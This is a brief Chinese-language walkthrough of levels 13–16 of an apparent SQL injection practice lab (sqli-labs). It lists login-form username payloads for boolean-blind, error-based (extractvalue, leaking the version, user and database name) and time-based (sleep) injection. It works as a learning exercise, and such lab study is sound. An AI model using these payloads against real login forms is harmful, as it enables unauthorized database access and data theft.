Less-13
输入username:admin’,密码随意
故
我们输入username:admin’)#,密码随意
只返回登录状态没有登录信息
所有我们可以使用盲注,这边使用布尔类型的盲注
猜数据库第一位
输入username:admin') and left (database(),1)>'a'#
密码随意
然后
用二分法一个个进行尝试就可以猜出数据库了,其他过程查看less-5那篇博客
Less-14
经过一些尝试,输入username:admin"#
密码随意
返回
和第三题一样,但这里不使用布尔注入,使用报错注入(目的是熟悉盲注)
输入:username:admin"and extractvalue(1,concat(0x7e,(select @@version),0x7e))#
//0x7e表示~符号
密码随意
爆用户名
username:admin"and extractvalue(1,concat(0x7e,(select user()),0x7e))#
爆数据库
username:admin"and extractvalue(1,concat(0x7e,(select database()),0x7e))#
Less-15
经过一些尝试,我们输入username:admin’#
密码随意
返回
与13题一样
这里采用延时注入
输入username:admin' and If(ascii(substr(database(),1,1))=115,1,sleep(5))#
密码随意
正确的时候可以直接登录;不正确的时候延时 5 秒,并显示未登录成功
Less-16
方法与Less-15一样
输入username:admin")and If(ascii(substr(database(),1,1))=115,1,sleep(5))#
密码随意